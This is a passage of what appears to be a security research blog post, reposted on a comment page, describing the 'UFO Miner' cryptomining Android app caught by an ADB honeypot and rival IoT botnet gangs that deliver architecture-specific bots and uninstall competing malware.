Comment
Author: Admin | 2025-04-28
Demands. The creator of “UFO Miner” thoughtfully set the throttle at 80%. Unfortunately, the Android Virtual Device we tested on did not obey that throttling command, and ran at full speed for the entire test.Devices that run at these speeds for an extended period of time can expect to fail at a greater than average rate, and will consume more power, which the victim is forced to subsidize.We want to believeUFO Miner is just one of a number of malicious apps that have been picked up by the honeypot, but it has (so far) been the most prolific. It seems that botherder gangs that operate IoT botnets (like Mirai) have slowly been joining the ADB bandwagon. Since the beginning of 2019, We’ve observed a number of different groups attempt to use the same remote-code execution exploits used by UFO Miner to deliver Linux shell scripts to the honeypot.A competing malware group is playing a game of “capture the flag” with the UFO Miner crowd. The “flag” is your Android device.These shell scripts profile the processor architecture of the device, and then download a bot, in the form of a Linux ELF application, designed to run on that architecture. These bot gangs appear to be aware of the prolific nature of the UFO Miner app, because the scripts contain shell commands to uninstall UFO Miner, as well as bots delivered by competing botnet gangs.As Android continues to permeate the IoT market, we expect to see more such attacks targeting the platform.What
Add Comment